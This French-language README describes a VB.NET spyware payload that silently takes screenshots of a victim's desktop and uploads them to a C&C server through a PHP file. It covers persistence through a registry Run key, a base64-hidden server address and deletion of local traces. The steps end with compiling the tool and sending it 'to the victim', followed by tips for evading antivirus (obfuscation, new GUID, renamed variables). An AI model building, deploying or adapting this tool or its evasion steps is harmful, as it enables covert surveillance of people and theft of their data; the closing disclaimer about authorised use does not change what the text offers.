Capture d'écran silencieuse | Charge utile post-exploitation | VB.NET
Une charge utile simple pour prendre la capture d'écran du bureau des victimes et la télécharger sur le C&C.
Caractéristiques:
- Persistant (à l'aide de la clé d'exécution du registre)
- Fonctionne en arrière-plan
- Moins de code, moins de bugs et moins de détection ;)
- Supprime la capture d'écran du disque après l'avoir téléchargée sur C&C
- Serveur C&C en base64
- Téléchargez des captures d'écran de manière organisée sur C&C
- Aucune redirection de port n'est nécessaire ! fonctionne avec un seul fichier php
- [TODO] Informations sur la machine
- [À FAIRE] Chiffrement
- [TODO] Définir l'intervalle à distance depuis C&C
Installation et utilisation :
- Clonez ce référentiel.
- Un hébergement que je recommande namecheap
- Accédez à votre dossier public_html et créez un nouveau fichier PHP et mettez-y le code ci-dessous
- Ouvrez le projet dans Visual Studio et modifiez la variable ci-dessous dans le code source
Dim server As String = BaseDecode1("your server address here in base64 encoded")
- et modifiez également cette variable ci-dessous
Dim php As String = "yourphpfilename.php?" & "folder="
- Compilez-le et envoyez-le à la victime, c'est tout !!
Conseil à un million de dollars ;)
Pour éviter la détection antivirus
- Changer l'icône de l'application
- Générer un nouveau GUID
- Change toutes les variables
- Dissimuler le code à l'aide d'Obfuscar
- Modifier les informations de l'assemblage
Donation:
Si cet outil vous a été utile, n'hésitez pas à me remercier en m'offrant un café :)
Clause de non-responsabilité:
Cet outil est censé être utilisé uniquement sur les systèmes autorisés. Toute utilisation non autorisée de cet outil sans autorisation explicite est illégale.
Licence:
LICENCE PUBLIQUE GÉNÉRALE GNU
